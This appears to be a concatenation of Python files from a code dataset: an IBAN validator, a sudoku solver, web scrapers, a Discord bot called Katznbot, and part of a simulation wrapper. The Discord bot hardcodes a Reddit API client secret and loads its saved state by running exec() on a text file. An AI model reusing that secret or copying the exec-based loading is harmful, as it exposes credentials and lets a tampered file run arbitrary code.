pos_integer\n\n def iban_validation(self):\n if self.iban == \"\":\n return [True, u\"\"]\n if not self.iban.isalnum():\n return [False, u'In IBAN only alfanumeric sighns are possible']\n\n prefix = self.iban[:2].lower()\n if not prefix.isalpha():\n return [False, u'Number should start with the country code']\n\n try:\n expected_length = Length.objects.get(country=prefix)\n except:\n expected_length = None\n\n if expected_length is not None:\n if expected_length.length != len(self.iban):\n return False, u'''\n For country %s expected \\\n length of IBAN is %s, not %s''' % (\n prefix,\n expected_length.length,\n len(self.iban)\n )\n\n control_sum = int(''.join(map(self.convert_num, self.iban[4:] + self.iban[:4])))\n if control_sum % 97 != 1:\n return [False, u'IBAN number is incorrect']\n\n return [True, u'IBAN number is correct']\n\n def bic_validation(self):\n if self.bic == \"\":\n return [True, u\"\"]\n if re.search(r'^([a-zA-Z]){4}([a-zA-Z]){2}([0-9a-zA-Z]){2}([0-9a-zA-Z]{3})?$', self.bic):\n return [True, u'BIC is correct']\n else:\n return [False, u'BIC is incorrect']\n\n def val_execute(self):\n return self.iban_validation(), self.bic_validation()\n","sub_path":"ibanbic/ibvalid/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"36065919","text":"import timeit\n\n##reads csv file, returns a list of lists\ndef get_board(csvfile):\n csvlist=[]\n fp=open(csvfile)\n for i in fp:\n csvlist.append(i.strip().split(','))\n fp.close()\n return csvlist\n\n##returns characters (not empty) present in given row\ndef in_row(board,row,column):\n Row=[]\n for i in board[row]:\n if i=='+':\n continue\n else:\n Row.append(int(i))\n return Row\n\n##returns characters (not empty) present in given column\ndef in_column(board,row,column):\n Col=[]\n for i in range(len(board)):\n if board[i][column]=='+':\n continue\n else:\n Col.append(int(board[i][column]))\n return Col\n\n##returns characters (not empty) present in given sector\ndef in_sector(board,row,column):\n Sec=[]\n seclen=int((len(board[row]))**(.5))\n for i in range(seclen):\n if row<(seclen*(i+1)):\n for j in range(seclen):\n if column<(seclen*(j+1)):\n for k in range((seclen*i),(seclen*(i+1))):\n for l in range((seclen*j),(seclen*(j+1))):\n if board[k][l]=='+':\n continue\n else:\n 
Sec.append(int(board[k][l]))\n return Sec\n\n##returns coordinates of first empty cell in board\n##if none, returns empty list (BASE CASE)\ndef get_blank(board):\n for i in range(len(board[0])):\n for j in range(len(board)):\n if board[i][j]=='+':\n return [i,j]\n return []\n\n##prints board with solved characters present \ndef print_board(board):\n print('+','---+'*len(board[0]),sep='')\n for i in board:\n print('| ', end='')\n for j in i:\n if j=='+':\n print(' ',' | ',sep='',end='')\n else:\n print(j,' | ',sep='',end='')\n print('')\n print('+','---+'*len(board[0]),sep='')\n\n##returns a list of potential characters for given board\ndef valid_characters(board):\n validlist=[]\n for i in range(len(board)):\n validlist.append(i+1)\n return validlist\n\n##attempts to solve board, returns True or False\n##if True: prints completed board\ndef solve(board):\n blank=get_blank(board)\n row=blank[0]\n column=blank[1] \n##what values should be tried for this empty cell\n validlist=valid_characters(board)\n Row=in_row(board,row,column)\n Col=in_column(board,row,column)\n Sec=in_sector(board,row,column)\n for i in Row:\n if i in validlist:\n validlist.remove(i)\n else:\n continue\n for i in Col:\n if i in validlist:\n validlist.remove(i)\n else:\n continue\n for i in Sec:\n if i in validlist:\n validlist.remove(i)\n else:\n continue\n##base case if no legal moves to be made\n if validlist==[]:\n return False\n for i in validlist:\n##records guess in current cell\n board[row][column]=i\n##base case if board is complete\n if get_blank(board)==[]:\n return True\n else:\n if solve(board):\n return True\n##resets cell to empty if guesses did not work\n board[row][column]='+'\n return False\n\n \n\nboard=(get_board('sudoku.csv'))\n\nprint_board(board)\nstart_time=timeit.default_timer()\nif solve(board):\n print(timeit.default_timer()-start_time)\n print_board(board)\n","sub_path":"HW2 TEST (numbers).py","file_name":"HW2 TEST (numbers).py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"68573819","text":"import urllib2\nfrom BeautifulSoup import BeautifulSoup\nimport re\nimport json\n\n\nclass Advert():\n\n def __init__(self, url):\n page = self.get(url)\n self.parse_advert(page)\n\n def get(self, url):\n request = urllib2.Request(url)\n request.add_header('User-Agent', 'hulme_bot-s0901522@sms.ed.ac.uk')\n return urllib2.urlopen(request).read()\n\n def parse_advert(self, page):\n content = BeautifulSoup(page)\n self.img = content.find('meta', {'name': 'og:image'})['content']\n self.title = content.find('meta', {'name': 'og:title'})['content']\n try:\n self.contact = content.find('meta', {'name': 'og:phone_number'})['content']\n except:\n self.contact = \"no details\"\n self.area = content.find('meta', {'name': 'og:locality'})['content']\n self.description = content.find('div', {'id': 'vip-description-text'}).contents\n self.price = content.find('span', {'itemprop': 'price'}).contents[0][1:]\n try:\n self.map_l = re.findall(\"center=(.*?)&\", str(content.find('a', {'class': 'open_map'}).find('img')['src']))\n except:\n self.map_l = \"na\"\n\n def to_html(self, url):\n try:\n html = \"
\"\n html += \"\" + self.title + \"\"\n html += \"
\" + self.area + self.map_l[0] + \"
\"\n html += \"
\" + self.contact + \"
\"\n html += \"
Price: \" + self.price + \"
\"\n html += \"

\" + self.description[0] + \"

\"\n except:\n html = \"mangled\"\n return html\n\n def to_history(self):\n ad_dict = {}\n ad_dict['price'] = self.price\n ad_dict['title'] = self.title\n ad_dict['description'] = self.description[0]\n return json.dumps(ad_dict)\n","sub_path":"advert.py","file_name":"advert.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"509423651","text":"#V0.2.0\r\n#required modules = [discord, random, time, os, praw]\r\n\r\nimport discord, random, time, os, praw\r\nfrom time import *\r\n\r\nexception = PermissionError #keep as PermissionError for testing, to identify glitches.\r\n\r\nreddit_bot = praw.Reddit(user_agent = 'katznbot', client_id = '_CIuAjxI8TaKvg', client_secret = 'HnpYVUD2jouM--6OdFzdFNJ_g2E', username = 'katznbot', password = '') #you can use this bot if you please. this is not private info.\r\n\r\ntoken = '' #delete info for public release\r\nbot = discord.Client()\r\n\r\nDATA = {}\r\nLINGERING = {'crates':0, 'xp':0}\r\nCRP = 1\r\n\r\n'''\r\n010: Normal user/no special permissions.\r\n020: N/A\r\n030: N/A\r\n040: N/A\r\n050: N/A\r\n060: Server owner/has access to server control permissions.\r\n070: Developer/has access to permissions that are being tested.\r\n080: Moderator/has access to most permissions.\r\n090: N/A\r\n100: Owner/has access to all permissions.\r\n'''\r\n\r\ntry:\r\n file = open('Katznbot_db_log.txt', 'r')\r\n exec(str(file.read()))\r\n file.close()\r\nexcept FileNotFoundError:\r\n print ('DATABASE LOG NOT FOUND')\r\n\r\nclass others:\r\n def fill(origional_string, full_length_to_fill, fill_with, seperator):\r\n NEW = (str(origional_string) + str(seperator) +\r\n (str(fill_with) * int(full_length_to_fill - len(origional_string))) + str(seperator))\r\n return NEW\r\n def gettime():\r\n OLD = str(localtime())\r\n YEAR = str((OLD.split(',')[0]).split('=')[1])\r\n MONTH = str((OLD.split(',')[1]).split('=')[1])\r\n DAY = str((OLD.split(',')[2]).split('=')[1])\r\n HOUR = str((OLD.split(',')[3]).split('=')[1]) \r\n MINUTE = str((OLD.split(',')[4]).split('=')[1])\r\n SECOND = str((OLD.split(',')[5]).split('=')[1])\r\n if len(str(MINUTE)) == 1: MINUTE = '0' + str(MINUTE)\r\n NEW = [(MONTH + '/' + DAY + '/' + YEAR + '-' + HOUR + ':'+ MINUTE), SECOND]\r\n return NEW\r\n def ascii_tize(string):\r\n string = str(string)\r\n AT = ''\r\n for _ in string:\r\n if str(_).lower() not in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\r\n 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\r\n '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '`', '~', '!',\r\n '@', '#', '$', '%', '^', '&', '*', '(', ')', '[', ']', '{', '}',\r\n '|', '\\\\', '\"', \"'\", ';', ':', ',', '<', '>', '.', '/', '?', ' ',\r\n '-', '_', '+', '=', '\\n']:\r\n _ = '*'\r\n AT = str(AT) + str(_)\r\n return AT\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n global DATA, LINGERING, CRP\r\n try:\r\n SENDER = others.ascii_tize(str(message.author))\r\n CHANNEL = others.ascii_tize(str(message.channel))\r\n SERVER = others.ascii_tize(str(message.server))\r\n CONTENT = others.ascii_tize(str(message.content))\r\n try:\r\n print (str(others.fill(CONTENT, 150, ' ', ' ')) + ' - ' + str(SENDER) + ' - ' +\r\n str(SERVER) + '//' + str(CHANNEL) + ' - ' + str(others.gettime()))\r\n except exception:\r\n print ('EXCEPTION ON on_message.main.print') \r\n if message.author != bot.user:\r\n try:\r\n DATA[str(message.author.id)]['xp'] += 4\r\n except KeyError:\r\n DATA[str(message.author.id)] = 
{'xp':0, 'roles':1, 'uname':SENDER, 'crates':1}\r\n try:\r\n if DATA[str(message.server.id)]['emoji_setup'] == False:\r\n print ('SETTING UP EMOJIS FOR SERVER: ' + str(SERVER) + ' ID: ' + str(message.server.id))\r\n for _ in os.listdir(str(os.getcwd()) + '\\\\images\\\\emojis'):\r\n bot.create_custom_emoji(message.server, name = ':kat_1:', image = open(str(str(os.getcwd()) + '\\\\images\\\\emojis\\\\' + str(_)), 'rb'))\r\n DATA[str(message.server.id)]['emoji_setup'] = True\r\n except KeyError:\r\n DATA[str(message.server.id)] = {'emoji_setup':False}\r\n if 'type' not in DATA[str(message.server.id)]:\r\n DATA[str(message.server.id)]['type'] = 'server'\r\n if 'type' not in DATA[str(message.author.id)]:\r\n DATA[str(message.author.id)]['type'] = 'user'\r\n if 'record' not in DATA[str(message.author.id)]:\r\n DATA[str(message.author.id)]['record'] = {'blocked':False, 'record_sheet':[]}\r\n if 'blocked' not in DATA[str(message.server.id)]:\r\n DATA[str(message.server.id)]['blocked'] = False\r\n if 'default_channel' not in DATA[str(message.server.id)]:\r\n DATA[str(message.server.id)]['default_channel'] = None\r\n if type(DATA[str(message.author.id)]['roles']) != int and type(DATA[str(message.author.id)]['roles']) != float:\r\n DATA[str(message.author.id)]['roles'] = 10\r\n DATA[str(message.author.id)]['uname'] = str(SENDER)\r\n DATA[str(message.author.id)]['last_info'] = {'message':str(CONTENT), 'time':str(str(others.gettime()) + ' @GMT+005'), 'chat':str(str(SERVER) + '/' + str(CHANNEL))}\r\n #-----------------------------------------------------------------------------COMMAND-LOOP\r\n if DATA[str(message.author.id)]['record']['blocked'] == False:\r\n if CONTENT.split(' ')[0].lower() == 'k!help':\r\n await bot.send_message(message.channel, '''```\r\nCommand list (some of which require higher ranks):\r\n\r\n k!help - Prints the main help menu. (10)\r\n k!help_codes - Prints the item code help menu. (10)\r\n k!item_info - Gives you information on the item from the database dictionary. (70)\r\n k!top - Prints the amount of XP owned by the selected group (group = self/all). (10)\r\n k!say - Prints the thing you say [but its cooler since I said it]. (10)\r\n k!version - Prints the current bot version. (10)\r\n k!lingering - Prints lingering item status. (70)\r\n k!push - Makes a crate or XP appear. (70)\r\n k!inventory - Prints your current inventory. (10)\r\n k!GiveUsingAdmin - Gives the designated amount the selected item. (70)\r\n k!reddit - Gets a post from the subbreddit. (10)\r\n k!restart_server_stats - Restarts server settings [emoji configs, and other things]. (70)\r\n k!ban_toggle - Toggles the ban for the user. (80)\r\n k!give_rank - Adjusts the rank for the user. (70)\r\n k!info - Prints the info for the person. (70)\r\n k!set_playing - Sets the bot activity highlight to the string. (80)\r\n k!crim_record - Prints the person's record. (60)\r\n k!charge - Writes the felony to the person's criminal record sheet. (60)\r\n k!delete_messages - Deletes the designated amount of messages from the channel. 
(60)\r\n```''')\r\n elif CONTENT.split(' ')[0].lower() == 'k!help_codes':\r\n await bot.send_message(message.channel, '''\r\n```\r\ncFX120u_1305zILm0TS - Status message code/sets the status message to \"k!help | \"\r\ncFX120u_1305zILm0TP - Status message code/sets the status message to \"k!help | \"\r\n```''')\r\n elif CONTENT.split(' ')[0].lower() == 'k!delete_messages':\r\n if DATA[str(message.author.id)]['roles'] >= 60:\r\n try:\r\n nod = int(CONTENT.split(' ')[1])\r\n msgs = []\r\n async for message in bot.logs_from((message.channel), limit = (nod + 1)):\r\n msgs.append(message)\r\n await bot.delete_messages(msgs)\r\n except:\r\n await bot.send_message(message.channel, 'Invalid parameters for `k!delete_messages`.')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!charge':\r\n if DATA[str(message.author.id)]['roles'] >= 60:\r\n felony = ''\r\n for _ in CONTENT.split(' ')[2:]:\r\n felony = str(felony) + str(_) + ' '\r\n DATA[str(CONTENT.split(' ')[1])]['record']['record_sheet'].append([felony, others.gettime(), str(message.server.id)])\r\n await bot.send_message(message.channel, str(str(CONTENT.split(' ')[1]) + ', you have been found guilty of the felony: ' + str(felony) + '.'))\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!crim_record':\r\n if DATA[str(message.author.id)]['roles'] >= 60:\r\n try:\r\n msg = str ('```')\r\n for _ in DATA[str(CONTENT.split(' ')[1])]['record']['record_sheet']:\r\n msg = str(msg) + str(_) + '\\n'\r\n msg = str(msg) + '```'\r\n if msg == '``````':\r\n msg = 'This person has no criminal record.'\r\n await bot.send_message(message.channel, str('Record sheet for userID ' + str(CONTENT.split(' ')[1]) + '\\n' + str(msg)))\r\n except KeyError:\r\n await bot.send_message(message.channel, 'User was not found, or has no existing record.')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!info':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n try:\r\n await bot.send_message(message.channel, str(DATA[str(CONTENT.split(' ')[2])][str(CONTENT.split(' ')[1])]))\r\n except KeyError:\r\n await bot.send_message(message.channel, 'Inproper key passed for `k!info.type`.')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.lower() == 'k!top all':\r\n msg = ''\r\n for _ in DATA:\r\n try:\r\n msg = str(msg) + str(str(others.fill(str(DATA[str(_)]['uname']), 40, ' ', ' '))) + str(DATA[str(_)]['xp'])\r\n if str(_) == str(message.author.id):\r\n msg = str(msg) + ' <--- You are here!'\r\n msg = str(msg) + '\\n'\r\n except:\r\n pass\r\n last = 0\r\n for item in range(0, len(msg), 1500):\r\n if item != 0:\r\n await bot.send_message(message.channel, str('```' + str(msg[last:item]) + '```'))\r\n last = item\r\n await bot.send_message(message.channel, str('```' + str(msg[last:len(msg)]) + '```'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!set_playing':\r\n if DATA[str(message.author.id)]['roles'] > 80:\r\n await bot.change_presence(game = discord.Game(name = str(CONTENT[14:])))\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this 
command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!give_rank':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n DATA[str(CONTENT.split(' ')[2])]['roles'] = int(CONTENT.split(' ')[1])\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!ban_toggle':\r\n if DATA[str(message.author.id)]['roles'] >= 80:\r\n status = ''\r\n person = str(CONTENT.split(' ')[1])\r\n try:\r\n if DATA[person]['record']['blocked'] == False:\r\n DATA[person]['record']['blocked'] = True\r\n status = 'blocked'\r\n else:\r\n DATA[person]['record']['blocked'] = False\r\n status = 'unblocked'\r\n except KeyError:\r\n await bot.send_message(message.channel, 'The person has no record sheet.')\r\n await bot.delete_message(message)\r\n await bot.send_message(message.channel, str('UserID: ' + str(person) + ' has been ' + str(status) + '.'))\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!reddit':\r\n postlink = 'Error getting link'\r\n cs = 1\r\n subred = str(CONTENT.split(' ')[1])\r\n rp = reddit_bot.subreddit(subred).new(limit = 200)\r\n done = False\r\n try:\r\n for _ in rp:\r\n if cs == CRP and done == False:\r\n postlink = str(_.url)\r\n CRP += 1\r\n if CRP == '199':\r\n CRP = 1\r\n done = True\r\n cs += 1\r\n except:\r\n pass\r\n await bot.send_message(message.channel, postlink)\r\n elif CONTENT.split(' ')[0].lower() == 'k!giveusingadmin':\r\n if CONTENT.split(' ')[1].lower() == 'xp':\r\n try:\r\n try:\r\n DATA[str(str(CONTENT).split(' ')[2])]['xp'] += int(str(CONTENT).split(' ')[3])\r\n await bot.send_message(message.channel, 'XP given.')\r\n except KeyError:\r\n await bot.send_message(message.channel, 'Result was `KeyError` which means that this may not be a user profile. This may also mean that the user is not in my database. Try doing a `k!item_info ` to check if they are registered.')\r\n except:\r\n await bot.send_message(message.channel, 'Result was `General failure`. You may have passed incorrect arguments for the command.')\r\n elif CONTENT.split(' ')[1].lower() == 'crate':\r\n try:\r\n try:\r\n DATA[(str(CONTENT).split(' ')[2])]['crates'] += int(str(CONTENT).split(' ')[3])\r\n await bot.send_message(message.channel, 'Crate given.')\r\n except KeyError:\r\n await bot.send_message(message.channel, 'Result was `KeyError` which means that this may not be a user profile. This may also mean that the user is not in my database. Try doing a `k!item_info ` to check if they are registered.')\r\n except:\r\n await bot.send_message(message.channel, 'Result was `General failure`. 
You may have passed incorrect arguments for the command.')\r\n else:\r\n await bot.send_message(message.channel, 'Incorrect argument[s] passed for the command `k!give`.')\r\n elif CONTENT.lower() == 'k!top self':\r\n await bot.send_message(message.channel, (str(DATA[str(message.author.id)]['uname']) + ', you have ' + str(DATA[str(message.author.id)]['xp']) + ' XP points!'))\r\n elif CONTENT.lower() == 'k!top':\r\n await bot.send_message(message.channel, 'Too few arguments have been passed for the command `k!top `.')\r\n elif CONTENT.split(' ')[0].lower() == 'k!restart_server_stats': ################################################################################################################## <---\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n None\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!item_info':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n try:\r\n await bot.send_message(message.channel, str('`' + str(DATA[str(CONTENT.split(' ')[1])]) + '`'))\r\n except KeyError:\r\n await bot.send_message(message.channel, 'Uh oh! It seems that that person is not in my registry. [evil laughs] ***but they will be soon...***')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() in ['k!say', 'k!echo']:\r\n CNEW = ''\r\n for _ in CONTENT.split(' ')[1:]:\r\n CNEW = str(CNEW) + str(_) + ' '\r\n await bot.send_message(message.channel, CNEW)\r\n await bot.delete_message(message)\r\n elif CONTENT.split(' ')[0].lower() == 'k!version':\r\n await bot.send_message(message.channel, 'The current Katznbot version is <0.2.0 - Beta Release>')\r\n elif CONTENT.split(' ')[0].lower() == 'k!lingering':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n await bot.send_message(message.channel, str('`' + str(LINGERING) + '`'))\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!pickuplc':\r\n if LINGERING['crates'] > 0:\r\n DATA[str(message.author.id)]['crates'] += 1\r\n await bot.send_message(message.channel, str('```' + str(SENDER) + ' picked up the lootcrate first! Type \"k!open\" to open it up and see what is inside!```'))\r\n LINGERING['crates'] -= 1\r\n elif CONTENT.split(' ')[0].lower() == 'k!pickupxp':\r\n if LINGERING['xp'] > 0:\r\n reward = random.randint(200, 5000)\r\n DATA[str(message.author.id)]['xp'] += reward\r\n await bot.send_message(message.channel, str('```' + str(SENDER) + ' picked up the XP first! ' + str(reward) + ' XP has been added to your inventory!```'))\r\n LINGERING['xp'] -= 1\r\n elif CONTENT.split(' ')[0].lower() == 'k!inventory':\r\n await bot.send_message(message.channel, str('```' + str(SENDER) + ', you have ' + str((DATA[str(message.author.id)]['crates'])) + ' lootcrates in your inventory. Type \"k!open\" to open them.```'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!push':\r\n if DATA[str(message.author.id)]['roles'] >= 70:\r\n if CONTENT.split(' ')[1].lower() == 'crate':\r\n LINGERING['crates'] += 1\r\n await bot.send_message(message.channel, '```A lootcrate has appeared! Type \"k!pickuplc\" to claim it!```')\r\n elif CONTENT.split(' ')[1].lower() == 'xp':\r\n LINGERING['xp'] += 1\r\n await bot.send_message(message.channel, '```Some XP has appeared! 
Type \"k!pickupxp\" to claim it!```')\r\n else:\r\n await bot.send_message(message.channel, 'Invalid parameters for command: k!push.')\r\n else:\r\n await bot.send_message(message.channel, str(str(SENDER) + ', you do not have a high enough role to use this command.'))\r\n elif CONTENT.split(' ')[0].lower() == 'k!open':\r\n if DATA[str(message.author.id)]['crates'] > 0:\r\n amount1 = random.randint(1000, 20000)\r\n amount2 = random.randint(1000, 20000)\r\n amount3 = random.randint(1000, 20000)\r\n amount4 = random.randint(1000, 20000)\r\n DATA[str(message.author.id)]['xp'] += amount1\r\n DATA[str(message.author.id)]['xp'] += amount2\r\n DATA[str(message.author.id)]['xp'] += amount3\r\n DATA[str(message.author.id)]['xp'] += amount4\r\n await bot.send_message(message.channel, str('```You opened the lootbox and got:\\n\\n' + str(amount1) + ' XP\\n' + str(amount2) + ' XP\\n' + str(amount3) + ' XP\\n' + str(amount4) + ' XP\\n\\nFor a total of ' + str(amount1 + amount2 + amount3 + amount4) + ' XP!```'))\r\n DATA[str(message.author.id)]['crates'] -= 1\r\n else:\r\n await bot.send_message(message.channel, 'You have no lootboxes to open!')\r\n #-----------------------------------------------------------------------------COMMAND-LOOP\r\n if random.randint(0, 100) == 2:\r\n item = random.choice(['crates', 'xp'])\r\n LINGERING[item] += 1\r\n if item == 'crates':\r\n await bot.send_message(message.channel, '```A lootcrate has appeared! Type \"k!pickuplc\" to claim it!```')\r\n else:\r\n await bot.send_message(message.channel, '```Some XP has appeared! Type \"k!pickupxp\" to claim it!```')\r\n except exception:\r\n print ('EXCEPTION ON on_message.main')\r\n await bot.send_message(message.channel, 'Whoops, seems that my code just made an error! The developer has been notified and will work on it. 
Info: `E1`.') #E1\r\n try:\r\n file = open('Katznbot_db_log.txt', 'w')\r\n file.write('DATA = ' + str(DATA))\r\n file.close()\r\n except exception:\r\n print ('EXCEPTION ON on_message.save')\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print (bot.user.name, bot.user.id)\r\n\r\nbot.run(token)\r\n","sub_path":"KatznbotBetaPublicRelease.py","file_name":"KatznbotBetaPublicRelease.py","file_ext":"py","file_size_in_byte":23181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"274179619","text":"# _*_ coding:utf-8 -*-\n# 开发人员:&杜乾坤\n# 开发工具:&pycharm\n#爬取链家二手房信息。\n# 要求:\n# 1.爬取的字段:\n# 名称,房间规模、价格,建设时间,朝向,详情页链接\n# 2.写三个文件:\n# 1.简单py 2.面向对象 3.改成多线程\n\nfrom selenium import webdriver\n#from selenium.webdriver.chrome.options import Options\nfrom lxml import etree\n\n\ndef get_element(url):\n driver.get(url)\n html = etree.HTML(driver.page_source)\n return html\n\n\nlis = [] # 存放所有区域包括房子\ndriver = webdriver.Chrome()\nhtml = get_element('https://bj.lianjia.com/ershoufang/')\ncity_list = html.xpath('//div[@data-role=\"ershoufang\"]/div/a/@href')\ncity_name_list = html.xpath('//div[@data-role=\"ershoufang\"]/div/a/text()')\nfor num, city in enumerate(city_list):\n item = {} # 存放一个区域\n sum_house = [] # 存放每个区域的房子\n item['区域'] = city_name_list[num] # 城区名字\n for page in range(1, 3):\n city_url = 'https://bj.lianjia.com' + city + 'pg' + str(page)\n html = get_element(city_url)\n '''名称, 房间规模,建设时间, 朝向, 详情页链接'''\n title_list = html.xpath('//div[@class=\"info clear\"]/div/a/text()') # 所有标题\n detail_url_list = html.xpath('//div[@class=\"info clear\"]/div/a/@href') # 所有详情页\n detail_list = html.xpath('//div[@class=\"houseInfo\"]/text()') # 该页所有的房子信息列表,\n city_price_list = html.xpath('//div[@class=\"totalPrice\"]/span/text()')\n for i, content in enumerate(title_list):\n house = {}\n detail = detail_list[i].split('|')\n house['名称'] = content # 名称\n house['价格']=city_price_list[0]+'万'#价格\n house['规模'] = detail[0] + detail[1] # 规模\n house['建设时间'] = detail[-2] # 建设时间\n house['朝向'] = detail[2] # 朝向\n house['详情链接'] = detail_url_list[i] # 详情链接\n sum_house.append(house)\n item['二手房'] = sum_house\n print(item)\n lis.append(item)\n\n","sub_path":"爬虫编程/案例20_爬取链家网北京每个区域的所有房子.py","file_name":"案例20_爬取链家网北京每个区域的所有房子.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"596851931","text":"##/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 15 11:03:24 2017\n\n@author: AP252436\n\"\"\"\n\nimport numpy as np\nimport os as os\n#import shutil\nimport subprocess as sub\nimport fileinput\n\n#==============================================================================\n# Messages colors\n#==============================================================================\ndef printc(message, color='red'):\n if color in ('red','r','warning'):\n escape_code = '\\x1b[41m'\n if color in ('blue', 'b','message'):\n escape_code = '\\x1b[34m'\n if color in ('green', 'g','results'):\n escape_code = '\\x1b[32m'\n if color in ('magenta', 'm','error'):\n escape_code = '\\x1b[35m'\n if color in ('cyan', 'c','info'):\n escape_code = '\\x1b[36m'\n normal_code = '\\x1b[0m'\n print(escape_code+message+normal_code)\n\n\n#==============================================================================\n# Class MULHcl\n#==============================================================================\nclass MULHcl(object):\n \"\"\"\n MULH simulation object.\n \n IMPORTANT :\n A config.mulh file 
should be present in the MULH/ directory.\n \n Results will be stored in the MULH/data/results_python folder.\n \"\"\"\n MULH_PATH = '/Home/AP252436/MULH/'\n BIN_PATH = MULH_PATH + 'bin/'\n counter = 0 #Counter in order to compile MULH only once\n error_counter = 0 # Counts every time a computation has to be made once again\n\n if not os.path.exists(MULH_PATH):\n raise OSError('Incorrect MULH folder absolute path') \n if not os.path.exists(BIN_PATH):\n raise OSError('Incorrect bin relative path -- check that there is a bin directory in the MULH folder')\n \n\n\n def __init__(self, project_path, \n config_path, \n output_path):\n \"\"\"\n Constructor\n \n Arguments:\n - project_path: absolute project path\n (- config_file: file called by MULHs.f90)\n (- results_file: name of the file where results are stored)\n \"\"\"\n \n self.project_path = project_path \n# if not os.path.exists(project_path):\n# raise OSError('Incorrect project directory absolute path')\n \n self.config_path = config_path\n# if not os.path.isfile(config_path):\n# print(config_path)\n# raise OSError('Incorrect relative config filename')\n \n self.output_path = output_path\n# if not os.path.isfile(output_path):\n# print(output_path)\n# raise OSError('Incorrect relative output filename')\n\n\n \n \n \n def create_config_file(self, config_path):\n \"\"\"\n Set config.mulh\n \n Argument:\n - project_path: where config.mulh should be stored\n \n Returns:\n - config.mulh: a config file in project_path\n \n Resources:\n - MULH_PATH/names.mulh: a text file containing all variable names\n - MULH_PATH/types.mulh: a text file containing all formats\n \n \"\"\"\n config = np.zeros(46, dtype = 'object')\n\n #****************************************************************************************************************************\n # \t\t\tUSER INPUTS\n #\n #\n # Analysis type (atype)\n # 0 = single run at a user specified power, not a power sweep. Can create a video by changing psave\n # 1 = single power sweep\n # 2 = varying length analysis. Requires same inputs as 1 but also to specify lower and upper lw (in multiples of 10)\n # 3 = convergence study. Specify lower and upper NOC_lambda.\n # 4 = sensitivity to toroidal magnetic field (Bx)\n # 5 = sensitivity to poloidal magnetic field (By)\n # 6 = sensitivity to radial magnetic field (Bz)\n # 7 = threshold for different machines using different materials at different frequencies\n # 8 = single sweep w/ controlled stochasticity. Provide px2, pv2, pphases and a stock of random deviates (need enough of them)\n # 9 = single sweep w/ controlled stochasticity. Provide px2, pv2, pphases, srand, drand, irand, secrand\n # 10 = time convergence study. Specify lower and upper CLfactor will be 0.99.\n # 11 = sensitivity to a_lara unknown factor that has to be between 7e-3 and 10e-3\n # 12 = stochastic oscillation of results\n # \n # NOTE = 2-7, 10, 11 and 12 can take a very long time so it is recommended to run them remotely (in a server)\n \n config[0] = 1 # atype\n #==============================================================================\n # ######### Geometry #########\n #==============================================================================\n config[1] = 70 # b: Height of the waveguide in mm\n config[2] = 2 # a: Width of the waveguide in mm\n config[3] = 70 # lw: Depth/Length of the waveguide in mm. 
If changed make sure there are still enough cells per wavelength\n config[4] = 160 # lwu: Upper waveguide length (if atype==2)\n \n config[5] = 20 # NOC_lambda: Number of Cells per wavelength\n config[6] = 50 # NOC_lambdau: Upper number of Cells per wavelength (for atype==3)\n config[7] = 0.95 # CLfactor: Factor to make sure Courant-Levy condition is obeyed. Decrease CLfactor for smaller time step\n config[8] = 0.1 # Prec: Threshold precision (dB)\n \n #==============================================================================\n # ######### Input Wave/Field solver #########\n #==============================================================================\n config[9] = 3.7e9 # f_I: Frequency of input wave in Hz\n config[10] = 1.0e4 # Pl0: Lower power limit (watts)\n config[11] = 1.0e6 # Pu0: Upper power limit (watts)\n \n config[12] = 1 # fields: Field solver. =1 FDTD, =2 analytic TE10 mode, =3 exported from other solver(need NOC_PML=1 w/ fields=3)\n config[13] = 1 # ramp: Increase fields slowly over ramp periods, integer\n config[14] = 1 # NOC_PML: 